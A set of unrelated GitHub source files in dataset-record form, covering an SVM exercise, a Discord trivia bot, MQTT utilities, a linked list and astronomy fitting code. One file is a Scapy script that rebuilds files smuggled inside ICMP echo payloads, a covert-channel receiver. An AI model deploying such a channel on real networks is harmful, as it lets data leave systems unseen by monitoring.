best[1]\n\ndef dataset3Params(X, y, Xval, yval):\n \"\"\"returns your choice of C and sigma. 
You should complete\n this function to return the optimal C and sigma based on a\n cross-validation set.\n \"\"\"\n\n# You need to return the following variables correctly.\n\n# ====================== YOUR CODE HERE ======================\n# Instructions: Fill in this function to return the optimal C and sigma\n# learning parameters found using the cross validation set.\n# You can use svmPredict to predict the labels on the cross\n# validation set. For example, \n# predictions = svmPredict(model, Xval)\n# will return the predictions on the cross validation set.\n#\n# Note: You can compute the prediction error using \n# mean(double(predictions ~= yval))\n#\n c_list = [0.01, 0.03, 0.1, 0.3, 1, 3, 10, 30]\n sig_list = c_list\n err = []\n for c_val in c_list:\n for sig_val in sig_list:\n gamma = 1.0 / (2.0 * sig_val ** 2)\n clf = svm.SVC(C=c_val, kernel='rbf', gamma=gamma, max_iter=200).fit(X, y)\n e = clf.score(Xval, yval)\n err.append([c_val, sig_val, e])\n return get_best_acc(pd.DataFrame(err))\n\n# =========================================================================\n","repo_name":"matkalinowski/ML-AndrewNg","sub_path":"ex6/grader/dataset3Params.py","file_name":"dataset3Params.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"30221074604","text":"\n#!/usr/bin/python\n\nfrom scapy.all import *\nimport sys\nimport os\n\n# tos = 1: filename ; tos = 0: payload ; tos = 2: EOF\nlast_tos = 0\n\nfilename = \"\"\npayload = b\"\"\n\ndef process_packet(packet):\n\tglobal last_tos\n\tglobal filename\n\tglobal payload\n\n\ttransfered_bytes = 0\n\tif type(filename) != str:\n\t\tfilename = filename.decode()\n\tprint(\"1: '{}'\".format(filename))\n\tprint(\"2: '{}'\".format(os.path.splitext(os.path.basename(filename).rstrip())[0]))\n\tprint(\"3: '{}'\".format(str(packet[IP].src)))\n\n\tprint(\"zob{}_az{}_er{}_ty{}\".format(os.path.splitext(os.path.basename(filename).rstrip())[0] , str(packet[IP].src) , datetime.now().strftime('%Y%m%d%H%M%S') , os.path.splitext(os.path.basename(filename).rstrip())[1]))\n\tprint(\"TOS : '{}'\".format(packet.tos))\n\tif last_tos == 0 and packet.ttl > 100:\n\t\tfilename = packet[ICMP].load[-len(packet[ICMP].load):].decode()\n\n\telif last_tos > 100 and packet.ttl > 100:\n\t\tfilename += packet[ICMP].load[-len(packet[ICMP].load):].decode()\n\telif last_tos > 100 and packet.ttl > 60:\n\t\tfilename = os.path.splitext(os.path.basename(filename).rstrip())[0] + \"_\" + str(packet[IP].src) + \"_\" + datetime.now().strftime('%Y%m%d%H%M%S') + os.path.splitext(os.path.basename(filename).rstrip())[1]\n\t\tprint(\"Receiving file {}\".format(filename))\n\t\tpayload = packet[ICMP].load[-len(packet[ICMP].load):]\n\t\ttransfered_bytes += len(payload)\n\t\tprint(\"{} bytes transfered\".format(transfered_bytes)),\n\telif last_tos > 60 and packet.ttl > 60:\n\t\tprint(\"6: '{}'\".format(payload))\n\t\tprint(\"7: '{}'\".format(packet[ICMP].load))\n\n\t\tpayload += packet[ICMP].load[-len(packet[ICMP].load):]\n\t\ttransfered_bytes += len(payload)\n\t\tprint(\"\\r{} bytes transfered\".format(transfered_bytes)),\n\n\tsys.stdout.flush()\n\n\tlast_tos = packet.ttl\n\n\tif packet.ttl <= 60:\n\t\tprint(\"\\r\\nWriting payload to file ({})...\".format(filename)),\n\t\tprint(\"5: '{}'\".format(filename))\n\t\twith open(filename, \"wb\") as fh:\n\t\t#fh = open(filename,\"w+\")\n\t\t\tfh.write(payload)\n\t\n\t\tprint(\"done!\")\n\t\tprint(\"4: '{}'\".format(payload))\n\t\tlast_tos = 0\n\n\nif 
len(sys.argv) == 1:\n print(\"Sniffing on all interfaces.\")\nelse:\n if sys.argv[1] == \"-h\":\n print(\"Usage: {0} []. Example: {0} eth0\".format(sys.argv[0]))\n exit()\n else:\n print(\"Sniffing interface: {}.\".format(sys.argv[1]))\n\nsniff(filter=\"inbound and icmp[icmptype] == 8\", prn=process_packet)\n","repo_name":"Joritz/SecuOS","sub_path":"hello/receiver2.py","file_name":"receiver2.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"14853405889","text":"#!/usr/bin/python3\n\"\"\"This module contains an implementation of a node and Singly linked list.\"\"\"\n\n\nclass Node:\n def __init__(self, data, next_node=None):\n self.__data = data\n self.__next_node = next_node\n\n @property\n def data(self):\n return self.__data\n\n @data.setter\n def data(self, value):\n self.__data = value\n\n @property\n def next_node(self):\n return self.__next_node\n\n @data.setter\n def data(self, value):\n self.__next_node = value\n\n\nclass SinglyLinkedList:\n def __init__(self):\n self.__head = None\n\n def sorted_insert(self, value):\n if self.__head is None:\n new_node = Node(value)\n self.__head = new_node\n else:\n copy = self.__head\n print(\"head\", self.__head)\n while copy is not None:\n print(f\"inserting {value}\")\n if copy.data > value:\n new_node = Node(value, copy)\n print(\"newnode\", new_node)\n copy = new_node\n break\n if copy.next_node is None:\n new_node = Node(value)\n copy.next_node = new_node\n break\n print(\"copy\", copy)\n\n def __str__(self):\n if self.__head is None:\n return\n str_rep = \"\"\n while self.__head is not None:\n str_rep += \"{:d}\".format(self.__head.data)\n if self.__head.next_node is not None:\n str_rep += \"\\n\"\n self.__head = self.__head.next_node\n return str_rep\n\n\nsll = SinglyLinkedList()\nsll.sorted_insert(2)\nsll.sorted_insert(5)\nsll.sorted_insert(3)\nsll.sorted_insert(10)\nsll.sorted_insert(1)\nsll.sorted_insert(-4)\nsll.sorted_insert(-3)\nsll.sorted_insert(4)\nsll.sorted_insert(5)\nsll.sorted_insert(12)\nsll.sorted_insert(3)\nprint(sll)\n","repo_name":"Ayobami0/alx-higher_level_programming","sub_path":"0x06-python-classes/100-singly_linked_list.py","file_name":"100-singly_linked_list.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"36113920418","text":"from attribute_image_maker import ImageAttributes\n\n\ndef image_features(rgb_image, num_block):\n features = []\n width = rgb_image.shape[1]\n height = rgb_image.shape[0]\n block_width = width//num_block[0]\n block_height = height//num_block[1]\n\n for y in range(0, height - block_height + 1, block_height):\n for x in range(0, width - block_width + 1, block_width):\n img_block = rgb_image[y:y+block_height, x:x+block_width]\n attr = ImageAttributes(img_block)\n block_features = attr.get_attributes()\n features.extend(block_features)\n return features\n","repo_name":"lobkovilya/PostprocessingImageChecking","sub_path":"TrainingSet/GeneratingScripts/tests/python/feature_generator.py","file_name":"feature_generator.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"72696012254","text":"from logging import error\r\nimport discord\r\nfrom discord import client\r\nfrom discord import message\r\nfrom discord.ext import commands\r\nimport urllib.request, json\r\nimport json\r\nfrom 
discord.utils import async_all\r\nfrom discord.webhook import AsyncWebhookAdapter\r\nfrom types import SimpleNamespace\r\nimport time\r\nimport csv\r\nimport os\r\nfrom discord import FFmpegPCMAudio\r\nfrom discord import TextChannel\r\nfrom discord.utils import get\r\nfrom youtube_dl import YoutubeDL\r\nimport requests\r\nimport re\r\nimport random\r\n\r\n# ------ #TODO# ------\r\n# Stop music when game end. (needs ctx)\r\n# Loop through questions.... (creates a bug with on_reaction_add - too many things for a single message)\r\n#\r\n\r\nintents = discord.Intents.default()\r\nintents.members = True\r\nclient = commands.Bot(command_prefix='.',intents=intents)\r\n# client.remove_command('help')\r\n\r\n# List of categories\r\ncategory_dict = {'General Knowledge' : 9, 'Books' : 10, 'Film' : 11, 'Music' : 12, 'Musicals & Theatres' : 13, 'Television' : 14 ,'Video Games' : 15\r\n,'Board Games' : 16,'Science & Nature' : 17,'Computer Science' : 18,'Mathematics' :19 ,'Mythology' : 20 ,'Sports' : 21, 'Geography' : 22,'History':23\r\n,'Politics':24,'Art':25,'Celebrities' :26,'Animals':27,'Vehicles':28,'Anime':31}\r\n\r\n\r\n@client.command()\r\nasync def categories(ctx):\r\n await ctx.send(\"The following categories are available for trivia\")\r\n await ctx.send(\"General Knowledge\\nBooks\\nFilm\\nMusic\\nMusicals & Theatres\\nTelevision\\nVideo Games\\nBoard Games\\nScience & Nature\\nComputer Science\")\r\n await ctx.send(\"Mathematics\\nMythology\\nSports\\nGeography\\nHistory\\nPolitics\\nArt\\nCelebrities\\nAnimals\\nVehicles\\nAnime\")\r\n\r\n#***********************************************#\r\n\r\n@client.command()\r\nasync def sus(ctx):\r\n await ctx.send(\"Sacha\")\r\n\r\n@client.command()\r\nasync def tom(ctx):\r\n await ctx.send(\"I failed math three times!! 
\\n0-5 btw\")\r\n\r\n #mateus\r\n@client.command()\r\nasync def antivax(ctx):\r\n await ctx.send(\"Mateus : GoVerNment is GonNA CoNtRoL mE\")\r\n\r\n#******************************************************************#\r\n\r\n@client.event\r\nasync def on_ready():\r\n clients = []\r\n\r\n cwd = os.getcwd()\r\n\r\n # Create file \"classroom(number).txt\"\r\n file_name = os.path.join(cwd, \"clients.txt\")\r\n\r\n txt_file = open(file_name, \"w\")\r\n\r\n #\r\n clients_file = open(\"clients.txt\",\"w\",encoding=\"utf-8\")\r\n for member in client.get_all_members():\r\n member_data = member.name\r\n raw_data = member_data+','+\"0\"+',,'\r\n try:\r\n txt_file.write(str(raw_data)+'\\n')\r\n except:\r\n print(member.name + \"Cant play lol\")\r\n\r\n\r\n txt_file.close()\r\n\r\n resp = \"Data file generated\"\r\n print(resp)\r\n\r\n'''\r\n for member in \r\n clients += member\r\n print(member)\r\n print(clients)\r\n '''\r\n\r\n@client.command()\r\nasync def getmember(ctx):\r\n username = ctx.message.author.name\r\n if(str(username) == \"TheMemer27\"):\r\n member_list = ''\r\n for member in ctx.guild.members:\r\n member_list += member.name\r\n print(member.name)\r\n await ctx.send(member.name)\r\n\r\n else:\r\n await ctx.send(\"Youre not admin\")\r\n\r\n# Greet new suer\r\n\r\n@client.event\r\nasync def on_member_join(member):\r\n print(f'{member} has joined a server.')\r\n\r\n#Send message when a user leaves\r\n\r\n@client.event\r\nasync def on_member_remove(member):\r\n print(f'{member} has left a server.')\r\n\r\n# Respond with latency in ms\r\n\r\n@client.command()\r\nasync def ping(ctx):\r\n await ctx.send(f\"pong: {round(client.latency*1000)}ms\" )\r\n\r\n# respond to Hi\r\n\r\n@client.command()\r\nasync def hi(ctx):\r\n await ctx.send(\"Hello I am BeanerBot.\")\r\n\r\n\r\n# command to stop voice\r\n@client.command()\r\nasync def leave(ctx):\r\n voice = discord.utils.get(client.voice_clients, guild=ctx.guild)\r\n if voice.is_connected():\r\n await voice.disconnect()\r\n else:\r\n await ctx.send(\"The bot is not connected to a voice channel.\")\r\n# Start a game of trivia\r\n\r\n@client.command()\r\nasync def trivia(ctx,args):\r\n global category_dict\r\n print(\"Passed argument: \" + args)\r\n\r\n if category_dict.get(args):\r\n url = 'https://opentdb.com/api.php?amount=1&category='+str(category_dict.get(args)) +'&difficulty=medium&type=multiple'\r\n req = urllib.request.Request(url)\r\n\r\n try:\r\n ##parsing response\r\n r = urllib.request.urlopen(req).read()\r\n cont = json.loads(r.decode('utf-8'), object_hook=lambda d: SimpleNamespace(**d))\r\n counter = 0\r\n channel = ctx.message.author.voice.channel\r\n voice = get(client.voice_clients, guild=ctx.guild)\r\n if voice and voice.is_connected():\r\n await voice.move_to(channel)\r\n else:\r\n voice = await channel.connect()\r\n\r\n YDL_OPTIONS = {'format': 'bestaudio', 'noplaylist': 'True'}\r\n FFMPEG_OPTIONS = {\r\n 'before_options': '-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5', 'options': '-vn'}\r\n voice = get(client.voice_clients, guild=ctx.guild)\r\n\r\n song = \"https://www.youtube.com/watch?v=PCIvOGveIK0\"\r\n if not voice.is_playing():\r\n with YoutubeDL(YDL_OPTIONS) as ydl:\r\n info = ydl.extract_info(song, download=False)\r\n song_URL = info['url']\r\n voice.play(FFmpegPCMAudio(song_URL, **FFMPEG_OPTIONS))\r\n voice.is_playing()\r\n except Exception as e:\r\n print(e)\r\n #await ctx.send(\"For music, join a channel!\")\r\n\r\n for question in cont.results:\r\n counter += 1\r\n print(\"Category:\" + args +\"\\n 
Question:\"+question.question+ \"\\nAwnsers:\"+ str(question.incorrect_answers))\r\n print(\"____________\")\r\n\r\n embed = discord.Embed(\r\n color=discord.Color.green()\r\n )\r\n embed.title= 'Trivia!'\r\n embed.add_field(name=\"Category\", value=(args), inline=\"False\")\r\n embed.add_field(name=\"Type\", value=(question.type), inline=\"False\")\r\n embed.add_field(name=\"Difficulty\", value=(question.difficulty), inline=\"False\")\r\n message = await ctx.send(embed=embed)\r\n i = 1\r\n while i > 0:\r\n\r\n time.sleep(1)\r\n\r\n embed.title= ('Trivia! '+f\"{i}s\")\r\n \r\n await message.edit(embed=embed)\r\n i -= 1\r\n\r\n\r\n embed.title= ('Trivia! Starting...')\r\n\r\n await message.edit(embed=embed)\r\n\r\n await message.delete()\r\n\r\n embed2 = discord.Embed(\r\n color=discord.Color.green()\r\n ) \r\n\r\n embed2.title= 'Trivia!'\r\n embed2.title= question.question\r\n embed2.add_field(name=(\"🅰 : \"+str(question.incorrect_answers[0])), value=\"_______\", inline=\"False\")\r\n embed2.add_field(name=(\"🅱️ : \"+str(question.incorrect_answers[1])), value=\"_______\", inline=\"False\")\r\n embed2.add_field(name=(\"© : \"+str(question.incorrect_answers[2])), value=\"_______\", inline=\"False\")\r\n embed2.add_field(name=(\"🌹 : \"+str(question.correct_answer)), value=\"_______\", inline=\"False\")\r\n\r\n message2 = await ctx.send(embed=embed2)\r\n \r\n await message2.add_reaction(\"🅰\" )\r\n await message2.add_reaction(\"🅱️\")\r\n await message2.add_reaction(\"©\")\r\n await message2.add_reaction(\"🌹\")\r\n\r\n else:\r\n await ctx.send(\"Invalid Category!\")\r\n\r\n\r\ndef save(user,credits):\r\n cwd = os.getcwd()\r\n\r\n # Open file \"clients.txt\" and save to a list\r\n file_name = os.path.join(cwd, \"clients.txt\")\r\n\r\n #txt_file = open(file_name, \"r+\")\r\n\r\n with open('clients.txt', newline='') as f:\r\n reader = csv.reader(f)\r\n data = list(reader)\r\n\r\n print(\"Opened File.... 
Saved to data\")\r\n f.close()\r\n\r\n print(\"Passed variable: \"+user)\r\n\r\n i = 0\r\n\r\n for name in data:\r\n\r\n client = re.sub(r'\\W+', '', name[0])\r\n #print(client)\r\n if client == user:\r\n print(name[1])\r\n print(\"Found user\")\r\n \r\n socialCredits = int(name[1])\r\n print(name[1])\r\n socialCredits += credits\r\n print(socialCredits)\r\n name[1] = socialCredits\r\n\r\n ##name[1] = credits\r\n \r\n print(name)\r\n break\r\n \r\n i+=1\r\n\r\n #\r\n clients_file = open(\"clients.txt\",\"r+\",encoding=\"utf-8\")\r\n\r\n with open('clients.txt', 'r+') as f:\r\n\r\n for name in data:\r\n\r\n s = \",\"\r\n #s = s.join(name)\r\n converted_list = [str(element) for element in name]\r\n joined_string = \",\".join(converted_list)\r\n clients_file.write(joined_string+'\\n')\r\n\r\n\r\n clients_file.close()\r\n \r\n@client.command()\r\nasync def credits(ctx):\r\n cwd = os.getcwd()\r\n\r\n # Open file \"clients.txt\" and save to a list\r\n file_name = os.path.join(cwd, \"clients.txt\")\r\n\r\n #txt_file = open(file_name, \"r+\")\r\n\r\n with open('clients.txt', newline='') as f:\r\n reader = csv.reader(f)\r\n data = list(reader)\r\n\r\n f.close()\r\n\r\n print(\"Passed variable: \"+ctx.message.author.name)\r\n\r\n i = 0\r\n\r\n for name in data:\r\n\r\n client = re.sub(r'\\W+', '', name[0])\r\n #print(client)\r\n if client == ctx.message.author.name:\r\n print(name[1])\r\n print(\"Found user\")\r\n \r\n socialCredits = int(name[1])\r\n print(name[1])\r\n\r\n\r\n embed = discord.Embed(\r\n color=discord.Color.gold()\r\n ) \r\n embed.title = 'Bank'\r\n embed.add_field(name=(str(ctx.message.author.name)), value=\"You have \"+name[1]+ \" social credits.\", inline=\"False\")\r\n\r\n await ctx.send(embed=embed)\r\n \r\n print(name)\r\n break\r\n \r\n i+=1\r\n\r\n\r\n\r\n@client.command()\r\nasync def test(ctx):\r\n username = ctx.message.author.name\r\n if(str(username) == \"TheMemer27\" or str(username) == \"AODA\"):\r\n save(str(username),50)\r\n\r\n else:\r\n await ctx.send(\"Youre not admin\")\r\n\r\n \r\n@client.event\r\nasync def on_reaction_add(reaction, user):\r\n user_list = []\r\n if str(user) not in user_list:\r\n user_list += [user]\r\n else:\r\n print(\"=--=--=-=-=- DUPLICATED =-=-=-=-=\")\r\n \r\n reactions = reaction.message.reactions\r\n # DO WHAT YOU WANT HERE \r\n if(str(user) != \"BeanerBot#0361\"):\r\n\r\n print(str(user) +\"\\t \"+ str(reaction))\r\n\r\n if(str(reaction) == \"🌹\"):\r\n if (user_list[0] == user):\r\n\r\n print(\"=========== WINNER MESSAGGE ===============\")\r\n\r\n #await reaction.message.delete()\r\n \r\n embed = discord.Embed(\r\n color=discord.Color.green()\r\n ) \r\n embed.title = 'Winner'\r\n embed.add_field(name=(str(user)), value=\"Has won 50 Social Credits!\", inline=\"False\")\r\n\r\n await reaction.message.edit(embed=embed)\r\n\r\n await reaction.message.clear_reaction(\"🅰\")\r\n await reaction.message.clear_reaction(\"🅱️\")\r\n await reaction.message.clear_reaction(\"©\")\r\n await reaction.message.clear_reaction(\"🌹\")\r\n\r\n a_string = str(user)\r\n split_string = str(a_string).split(\"#\", 1)\r\n\r\n substring = split_string[0]\r\n print(substring)\r\n\r\n save(str(substring),50)\r\n\r\n \r\n else:\r\n print(\"=========== GAME END ===============\")\r\n\r\n #await reaction.message.delete()\r\n \r\n embed = discord.Embed(\r\n color=discord.Color.red()\r\n ) \r\n embed.title = 'Looser'\r\n embed.add_field(name=(str(user)), value=\"Hold this: L\", inline=\"False\")\r\n\r\n await reaction.message.edit(embed=embed)\r\n\r\n await 
reaction.message.clear_reaction(\"🅰\")\r\n await reaction.message.clear_reaction(\"🅱️\")\r\n await reaction.message.clear_reaction(\"©\")\r\n await reaction.message.clear_reaction(\"🌹\")\r\n\r\nclient.run('YOUR_KEY_HERE')\r\n","repo_name":"CarlosR4/DiscordBot","sub_path":"discord_bot.py","file_name":"discord_bot.py","file_ext":"py","file_size_in_byte":12456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"23151488299","text":"#################\n## FDA - GET LINKS - Scraper\n## 07/08/20\n## DJ Edwards\n#################\nimport scrapy\n\nclass getLinks_FDA(scrapy.Spider):\n name = \"FDA_links\"\n\n start_urls = ['https://www.fda.gov/emergency-preparedness-and-response/counterterrorism-and-emerging-threats/coronavirus-disease-2019-covid-19'\n ]\n\n def parse(self, response):\n filename = 'all_FDA_links.txt'\n links = response.css('p a::attr(href)').getall()\n with open(filename,'a') as f:\n f.write(','.join(links))","repo_name":"djEdwards/Government-Scraper","sub_path":"government_covid19/government_covid19/spiders/getLinks_FDA.py","file_name":"getLinks_FDA.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"15683303257","text":"# MQTT-Utils.py\n# library of routines to assist with using getting IoT data, \n# then using MQTT protocol to manipulate it,\n# particularly for use in the Cayenne Cloud.\n# Consolidated from https://github.com/SteveCossy/IOT\n# Started 09 Jan 2020 by Steve Cosgrove\n\nimport csv, sys, os, json, webbrowser, time, datetime, logging, string\nfrom collections import OrderedDict\n\ndef HelpMessage():\n print(\"You need help! Try https://github.com/SteveCossy/IOT/wiki\")\n\n\ndef DegMin2DegDeci(Location,Direction):\n# Change Degrees.Minutes to Degrees.DecimalPartOfDegrees\n# Location is a Degrees.Minutes float\n# Direction is North South East or West\n# Whole,Deci = divmod(float(Location),1)\n Whole,DeciShifted = str(Location).split('.')\n Deci = int(DeciShifted) / (10**len(DeciShifted))\n DecDeci = float(Whole+ str( Deci / 0.60 ).lstrip('0'))\n if Direction == 'W' or Direction == 'S':\n DecDeci *= -1\n return (DecDeci)\n\ndef PiSerial ():\n# Preference is a string saying whether our preference is tty or USBx\n# Assumes tehre will only be one onboard serial port\n# Based on https://stackoverflow.com/questions/12090503/listing-available-com-ports-with-python\n# ... and https://stackoverflow.com/questions/54288475/pyserial-module-serial-has-no-attribute-tools/54288652\n# ... and https://pyserial.readthedocs.io/en/latest/tools.html\n# GPIO serial port is not detected. 
See https://github.com/SteveCossy/IOT/wiki/Serial-Port-Use\n# https://raspberrypi.stackexchange.com/questions/45570/how-do-i-make-serial-work-on-the-raspberry-pi3-or-later-model/45571#45571\n\n from serial.tools import list_ports\n\n Ports = list_ports.comports(include_links=False)\n Devices = {}\n\n for Port in Ports :\n Device = Port.device\n if ('USB' in Device):\n USBnbr = Device[-4:]\n Devices[USBnbr] = Device\n# else:\n# Devices['Onboard'] = Device Always returns /dev/ttyAMA0 no not helpful\n return Devices\n\ndef DataError(Device, Channel, textMessage, PacketIn):\n CrLf = '\\r\\n'\n print (\"Device: \",Device,CrLf \\\n ,\"Channel: \",Channel,CrLf \\\n ,\"Message: \",textMessage,CrLf \\\n ,\"Packet Recieved: '\"+str(PacketIn)+\"'\" \\\n )\n\ndef Save2CSV (CSVPath, Device, Channel, Data):\n# CSVPath String: is folder for the file (filename to be made from device & channel)\n# Device is a unique ID. Perhaps the very long Cayenne Device ID\n# Channel unique letter used to distiguish different sensors on same device\n# ref https://github.com/SteveCossy/IOT/wiki/Tables-defining:-Cayenne-Data-Channels---PicAxe-Channels---Cicadacom\n# Data what we are going to write.\n\n# import datetime\n CurrentTime\t= datetime.datetime.now().isoformat()\n CSV\t\t= '.csv'\n CSVFile\t= str(Device)+\"_\"+str(Channel)+CSV\n CrLf \t= '\\r\\n'\n CSVPathFile\t= os.path.join(CSVPath, CSVFile)\n FIELDNAMES\t= ['time','device','data']\n\n DATALIST = {'time':CurrentTime,\n\t\t'device':Device,\n\t\t'data':Data\n\t\t}\n print ( 'Save2CSV', DATALIST )\n # Needs thinking about further - test type, as it could also be a list\n\n if not os.path.isfile(CSVPathFile):\n # There is not currently an output file\n print (\"Creating new output file: \"+CSVPathFile)\n if not os.path.exists(CSVPath):\n os.mkdir(CSVPath)\n with open(CSVPathFile, 'w') as CSVFile:\n writer = csv.DictWriter(CSVFile, fieldnames=FIELDNAMES)\n writer.writeheader()\n with open(CSVPathFile, 'a') as CSVFile:\n writer = csv.DictWriter(CSVFile, fieldnames=FIELDNAMES)\n writer.writerow(DATALIST)\n return CSVPathFile\n\n\ndef Save2Cayenne (client, Channel, Data, Divisor):\n# Client is an open MQTT client object\n# Channel is the Cayenne channel letter for the data\n# Data is a data type appropriate for that type of channel\n# ref https://github.com/SteveCossy/IOT/wiki/Tables-defining:-Cayenne-Data-Channels---PicAxe-Channels---Cicadacom\n\n# Define the PicAxe Channels\n ChannelMap = dict.fromkeys(string.ascii_uppercase)\t# Keys are 'A' 'B' 'C' 'D'\n for key in ChannelMap :\n ChannelMap[key]\t\t= ord(key)-64\t\t# A=1 B=2 etc\n\n# Add other arbatory Channels\n ChannelMap['CPUtemp']\t = 41\n ChannelMap['Stat']\t\t = 40\n ChannelMap['ExtTemp']\t = 47\n ChannelMap['WifiLvl']\t = 46\n ChannelMap['WifiLnk']\t = 45\n ChannelMap['DiskAvg']\t = 44\n ChannelMap['LoadAvg']\t = 43\n ChannelMap['PengDetect'] = 48\n ChannelMap['ErrCount'] = 49\n\n print ( 'Save2Cayenne', Channel+':(',ChannelMap[Channel],')' \\\n , 'Data:', Data )\n\n if Channel in ChannelMap:\n Data = Data / Divisor\n client.virtualWrite( ChannelMap[Channel], Data, \"analog_sensor\", \"null\")\n else:\n print( \"********* Channel \"+Channel+\" not found! 
**************\")\n client.loop()\n \ndef to_geojson(InputFile, OutputFile):\n \"\"\"Convert CSV file to GeoJSON\"\"\"\n\n li = []\n with open(InputFile, 'r') as CsvFile:\n # dialect = csv.Sniffer().sniff(CsvFile.read(1024))\n reader = csv.reader(CsvFile, delimiter=',')\n next(reader) # skip header\n # reader = csv.reader(CsvFile, dialect)\n for TIME,RSSI,LAT,LONG in reader:\n d = OrderedDict()\n d['type'] = 'Feature'\n d['properties'] = {\n 'TimeStamp': TIME,\n 'RSSI': RSSI,\n 'Lat' : LAT,\n 'Long': LONG\n }\n d['geometry'] = {\n 'type': 'Point',\n 'coordinates': [float(LONG), float(LAT)]\n # 'coordinates': [Latitude, Longitude]\n }\n li.append(d)\n\n # print( 'Writing '+OutputFile )\n\n d = OrderedDict()\n d['type'] = 'FeatureCollection'\n d['features'] = li\n with open(OutputFile, 'w') as f:\n f.write(json.dumps(d, sort_keys=False, indent=4))\n\n# webbrowser.open('http://net-informations.com', new=2)\n\n# NewURL = 'http://students.pcsupport.ac.nz/OSM/?'+OutputFile\n# os.system(\"echo \"+NewURL+\" >NewURL.url\")\n# webbrowser.open(NewURL, new=2)\n\n# This script is not intended to be called on the command line.\n# If it is called that way, then it will give a help message and exit\nif __name__ == '__main__':\n HelpMessage()","repo_name":"SteveCossy/IOT","sub_path":"LoRaReAd/MQTTUtils.py","file_name":"MQTTUtils.py","file_ext":"py","file_size_in_byte":6171,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"70531040094","text":"class Node:\n def __init__(self,data=None):\n self.data=data\n self.next=None\n\nn1=Node(11)\nn2=Node(21)\nn3=Node(31)\nn4=Node(41)\nn5=Node(51)\nn6=Node(61)\n\nn1.next=n2\nn2.next=n3\nn3.next=n4\nn4.next=n5\nn5.next=n6\nn6.next=None\n\nprev=None\ncurr=n1\nnext=n1.next\n\nwhile curr is not None:\n curr.next=prev\n prev=curr\n curr=next\n if next is not None:\n next=next.next\n\nhead=prev\n\nwhile head is not None:\n print(head.data,end=\" \")\n head=head.next\nprint()","repo_name":"kai-subramanian/Algorithms-and-Data-Structures","sub_path":"Python/Data Structures/reverseLL.py","file_name":"reverseLL.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"15319865514","text":"import numpy as np\nimport astropy\nimport copy as copy\nimport os\n\nfrom . import ComparisonPlot as CP\n\"\"\"\n This module contains routines needed to compare a number of Barolo and FAT fits to a given galaxy with each other. 
It contains the routines:\n FitComparisonFunctions --> This function makes a dictionary of other functions that may be useful in other modules.\n MakeFitComparisonsFolder --> This function makes a folder to hold the comparison plots.\n CompareFits --> This function does the actual fit comparisons.\n GetFits --> This function loads in all the different fits into an array of tilted ring dictionaries.\n GetBaroloFit --> This loads in a Barolo fit as a tilted ring dictionary\n GetFATFits --> This loads in a FAT fit as a pair of tilted ring dictionaries.\n\"\"\"\n\ndef FitComparisonFunctions():\n \"\"\"\n This function makes a dictionary of other functions for ease in passing to other modules.\n \"\"\"\n CompareFncs={'GetAllFits':GetFits,'GetBaroloFit':GetBaroloFit,'GetFATFit':GetFATFits}\n return CompareFncs\n \ndef MakeFitComparisonsFolder(FolderDict):\n \"\"\"\n This module makes a folder to holder the comparison plots\n \"\"\"\n os.makedirs(FolderDict['FitsComparisionFolder'], exist_ok=True)\n\ndef CompareFits(ObjDict,FolderDict,AnalysisFncs,FittingOptions):\n \"\"\"\n This function does the comparison between multiple Barolo and FAT fits and makes a diagnostic plot\n \"\"\"\n # First load in and analyze the sofia cubelet for comparisons later on. The load-in routine is found in CubeLoad/CubeAnalysis.py\n CubeInfo=AnalysisFncs['CubeFnc']['SoFiA_CubeAnalysis'](ObjDict)\n # Add in the object name from the cube file to the object dictionary\n # Try to get the name of the galaxy from the cube header (but replace spaces with underscores)\n try:\n ObjDict['ObjName_From_Cube']=CubeInfo['CubeHeader']['OBJECT'].replace(' ','_')\n # If this doesn't work, use the underscored name from the catalogue.\n except:\n ObjDict['ObjName_From_Cube']=ObjDict['ObjName_Underscored']\n # Load all the fits into an array of Tilted-ring dictionaries\n FitParams=GetFits(ObjDict,FolderDict,AnalysisFncs,FittingOptions,CubeInfo)\n # Make a comparison plot\n CP.MakeComparisonPlot(ObjDict,FolderDict,CubeInfo,FitParams,FittingOptions,AnalysisFncs)\n\n\ndef GetFits(ObjDict,FolderDict,AnalysisFncs,FittingOptions,CubeInfo):\n \"\"\"\n This function loads in all the different fits into an array of tilted ring dictionaries.\n \"\"\"\n # Set the number of fit dictionaries that will be required\n FitParams=[None]*FittingOptions['nTotFits']\n # Initialize the fit counter\n FitNum=0\n # Loop through all Barolo Fits\n for i in range(FittingOptions['nBaroloFits']):\n # Load in the Barolo fit\n FitParams[FitNum]=GetBaroloFit(ObjDict,FolderDict,AnalysisFncs,FittingOptions,CubeInfo,i)\n # Increase the number of dictionaries by 1\n FitNum+=1\n \n # Loop through all FAT fits\n for i in range(FittingOptions['nFATFits']):\n # Load in the FAT fit\n FitParams[FitNum],FitParams[FitNum+1]=GetFATFits(ObjDict,FolderDict,AnalysisFncs,FittingOptions,CubeInfo,i)\n # Increase the counter by 2 as each FAT fit has 2 dictionaries.\n FitNum+=2\n # Return the array of dictionaries\n return FitParams\n\n\ndef GetBaroloFit(ObjDict,FolderDict,AnalysisFncs,FittingOptions,CubeInfo,FitStep):\n \"\"\"\n This dictionary loads in a Barolo fit as a tilted ring dictionary\n \"\"\"\n # Load in the Barolo fit for the galaxy indicated by the ObjDict, using the particular fit that was run with the options set in the particular field (see ReleaseConfigurationOptions/). 
